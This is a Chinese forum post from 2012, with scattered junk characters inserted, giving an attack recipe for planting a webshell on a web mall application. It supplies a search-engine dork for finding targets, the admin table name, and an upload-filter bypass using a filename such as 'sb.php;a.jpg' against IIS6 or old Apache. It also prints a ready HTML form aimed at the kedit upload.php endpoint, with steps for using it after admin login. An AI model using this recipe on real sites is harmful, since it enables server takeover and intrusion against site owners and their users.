关键字:inurl:webmall/detail.php?id
, f" y s4 d8 x9 }! C K
: Q/ I' `! O# a% }4 X6 B数据表:pwn_base_admin* S. s. D& ~ X# e# R
! S6 n1 b% d9 \* S: v, V4 t关于拿shell
# y! F/ P9 y/ v0 u9 K! I p
+ o( r# l2 `1 s4 o' c+ ]首先登录后台admin.php; ~' H4 U T4 u5 b0 e+ T) q" Q
1 \ p+ J( f- I. r- {看了upload.php源码,分析了一个下午,然后大约是明白了虽然上传那里只允许上传gif,jpg,png,bmp四种文件,但是并没有对文件名做限制。0 N0 A5 y2 X: N* W- e3 {
换句话说,sb.php;a.jpg这样的文件也是允许的,只要服务器是IIS6就拿到webshel,低版本的apache可以试着重命名为sb.php.jpg
, s2 L- L2 u: A6 V$ U( _然后搞完了才发现,这里的比我的更精简,我那个蛋疼,膜拜下三石,然后就借用了,我的开始和他的一样是采取全部源码的,然后发现了更精简的
5 W( [0 q2 y8 A- }+ M<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://xxx.com/kedit/upload_cgi/upload.php">
) q5 d) }$ z s2 G* n; [<input type="text" name="fileName" value="sb.php;a.jpg" /> * j8 W; I5 n( O0 Z
<input type="hidden" name="attachPath" value="news/pics/" />
/ a' h+ T7 u& _6 A. F& ]1 S& q<input type="file" name="fileData" size="14" /></td>
0 ?' h8 p7 Y; n |/ ?<input type="submit" name="button" value="确定" /> % z+ Y: j9 @& d5 _3 K+ \& Z
</form>
( a- q- f; g2 Z$ g T. Y/ g/ d* a
; ?0 i4 H% O" t! e+ J首先登录后台,然后把上面的文件保存为xx.html,修改action,然后再上传,如果为iis6就在上传了查看源码就好了。# N; E. m* m' }7 Y- X( a. ?
7 B$ `8 X, O: ]. C' x
|
发表于 2012-11-9 20:52:15
收藏
支持
反对